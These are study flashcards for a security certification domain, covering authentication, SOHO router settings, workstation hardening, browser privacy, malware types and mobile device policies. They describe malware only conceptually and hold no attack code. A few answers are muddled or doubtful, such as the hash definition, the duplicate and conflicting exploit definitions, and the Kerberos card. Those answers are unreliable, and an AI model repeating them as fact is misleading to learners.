Domain 2: Security Flashcards
Difference between procedural & logical security controls
-Procedural are enforced by people
-Logical are enforced by cyber systems & software
2-step verification
Authentication mechanism that uses a separate channel to authorize a sign-on attempt or to transmit an additional credential. E.g. email, text or voice call.
Risk
Likelihood and impact (or consequence) of a threat actor exercising a vulnerability
Vulnerability scanner
A class of software designed to detect noncompliant systems
Difference between unprotected system and a noncompliant system
An unprotected system has at least one security control either missing or improperly configured
-a noncompliance system has drifted from its hard configuration
Exploit
Malicious code that can use a vulnerability to compromise a host
True or false: an evil twin is an on-path attack
True
XSS
Cross-site scripting
Malicious script hosted on the attacker’s site or coded in a link injected onto a trusted site designed to compromise clients browsing the trusted site, circumventing the browser’s security model of trusted zones.
SQL Injection
Structured Query Language Injection
Attack that injects a database query into the input data directed at a server by accessing the client side of the application
Hash
Function that converts an arbitrary-length stream into a fixed-length string input
The main drawback of asymmetric encryption
A message cannot be larger than the key size
For what is asymmetric encryption often used?
To encrypt cryptographic hashes and to encrypt symmetric encryption keys, then referred to as session keys
Exploit
Specific method by which malware code infects a target host, often via some vulnerability in a software process
Why CCMP makes replay attacks harder than TKIP did
CCMP provides authenticated encryption
True or False: enterprise networks support, RADIUS, TACACS+, and Kerberos for authentication
False
Kerberos communication is tunneled & not directly supported
Photo I.D. Authentication type
Something you are
Yellow ports on a home router
LAN ports
How to update the firmware on a router
Download the update from the vendor’s website & then in the management app select the firmware upgrade option and browse for the firmware file you downloaded
How a Soho router performs content filtering
It downloads curated reputation databases
Port forwarding
Process in which a router takes requests from the Internet for a particular app and sends them to a designated host on the LAN
Port triggering
Mechanism to configure access through a firewall for applications that require more than one port
UPnP
Setting on a Soho router that allows an app to send instructions to the firewall with the correct configuration perimeters
DMZ or DMZ host on a home router
A computer on the LAN that is not protected by the router’s firewall
Minimum password length for non-administrative user accounts
12+
Pre-boot authentication
The loading of an authentication application by UEFI firmware in order to contact an authentication server on the network & allow the user to submit the credentials for their account
System user password
A password that is shared by all users & is required before any operating system can boot (very rarely used)
Lunchtime attack
A threat actor is able to access a computer that has been left unlocked
How to lock a Windows computer
From the power icon or START+L
What should happen when the default administrator account is used
Generation of an alert
Where account policies are configured on a standalone workstation
Local Security Policy snap-in
(or
Group Policy Editor snap-in)
4 examples of account policies for security
- Restricted login times
- Timeout/screen lock
- Failed attempts lockout
- Concurrent logins
Execution control
Process of determining what additional software may be installed on a client or server computer beyond its baseline to prevent the use of unauthorized software
2 types of antivirus software updates
- Definition/pattern updates
- Scan engine/component updates (i.e. the program itself)
Difference between
1) port security triggers
2) application security triggers
and
3) Address triggers
in firewalls
They are based on
1) port number
2) the process that listens for connections
3) IP or FQDN of the server or client hosts
EFS
NTFS feature supporting file & folder encryption, not available in Home editions
Main advantages of full disk encryption vs. file/folder encryption
It doesn’t depend on the user to remember to encrypt data. It also encrypts more, such as swap files, print queues, & temp files
BitLocker To Go
BitLocker for removable drives
TPM
Trusted Platform Module
Specification for secure hardware-based storage of encryption keys, hashed passwords, & other user- and platform-identification information
7-item security checklist for workstations
- Password best practices
- End-user best practices
- Account management
- Disable or change the password of the default administrator account
- Disable AutoRun/AutoPlay
- Windows Update, Antivirus, & firewall are enabled
- Data-at-rest encryption, i.e. EFS or BitLocker
Method most websites now use instead of plug-ins to serve dynamic & interactive content more safely
HTML version 5
What 1) hamburger & 2) meatball menus look like
1) 3 horizontal lines stacked on top of each other
2) 3 horizontally or vertically aligned dots
What you must do when using enterprise certificates for internal sites & a third-party browser
Ensure that the internal CA root certificate is added to the browser
The main function of web browser privacy controls
Governing sites’ use of tracking tools such as cookies
Cookie
A text file used to store session data
What an incognito window does
Disables the caching features of the browser so that no
- cookies
- browsing history
- form fields
- passwords
or
- temp files
will be stored when the session is closed
Primary indicator that must be verified before using a web form
Lock icon indicating the site uses a trusted certificate
6 file extensions for executable code
.exe
.msi
.dll
.com
.scr
.jar
Virus
Malware concealed within the code of an executable process image stored as a file on disk
Worm
Malware that replicates between processes in system memory
Fileless malware
Code that uses the host’s scripting environment to create malicious processes in memory
RAT
Remote access Trojan
Malware that implements an access to a PC
RAT (where it’s found & what it does)
Remote access Trojan
A.k.a backdoor. Often uses command sequences embedded in HTTPS or DNS traffic to establish a connection between the compromised host and a command and control (C2 or C&C) host or network
8 things Spyware can do
- allow tracking cookies
- change default search providers
- open arbitrary pages at startup
- add bookmarks
- monitor local app activity
- take screenshots
- activate recording devices
- redirect DNS
Rootkit
Malware running with system level privileges
[pg. 273]
2 ways rootkits hide
- Make changes so that Explorer, Task Manager, ps, or top no longer reveal their presence
- Clean system logs
Cryptominer
Hijack’s the resources of the host to perform cryptocurrency mining
5 types of malware as defined according to vector
Viruses
Boot sector viruses
Trojans
Worms
Fileless malware
3 common PC malware infection symptoms
- the computer fails to boot or experiences lock ups
- Performance at startup or in general is very slow
- The host cannot access the network and/or Internet access or network performance is slow
What antivirus, firewall, or Windows Update not working, & crashing software from reputable vendors (including Windows tools) is all a symptom of
Malware infection
Malware symptoms that are unlikely to have other causes
File system errors & anomalies
Rogue antivirus
A type of malware that pretends to have found an infection on the victim’s computer
3 most common causes of certificate warnings
- The certificate is self-signed or issued by a CA that is not trusted
- The FQDN requested by the browser is different from the subject name listed in the certificate
- The certificate has expired or is listed as revoked
2 types of malware which might cause browser redirection
Adware & spyware
On-access scanning
When A-V software intercepts an OS call to open a file & scans the file before allowing or preventing its opening
How “no-root” firewalls work
Creating a VPN & controlling app access to it
COBO
Corporate owned, business only
The device is the property of the company & may only be used for company business
COPE
The device is chosen and owned by the company and remains its property. The employee may use it for personal things, subject to the AUP.
CYOD
Choose your own device
The device is chosen by the employee and owned by the company and remains its property. The employee may use it for personal things, subject to the AUP.
Enterprise wipe
Remote-initiated wipe of a mobile device that removes corporate apps and data only
4 ways to destroy a disk
- Shredding with a mechanical shredder
- Incinerating in a furnace designed for media sanitization
- Degaussing with a powerful magnet
- Drill/hammer [less secure]
User permission level for modifying system files or installing a service
Administrator
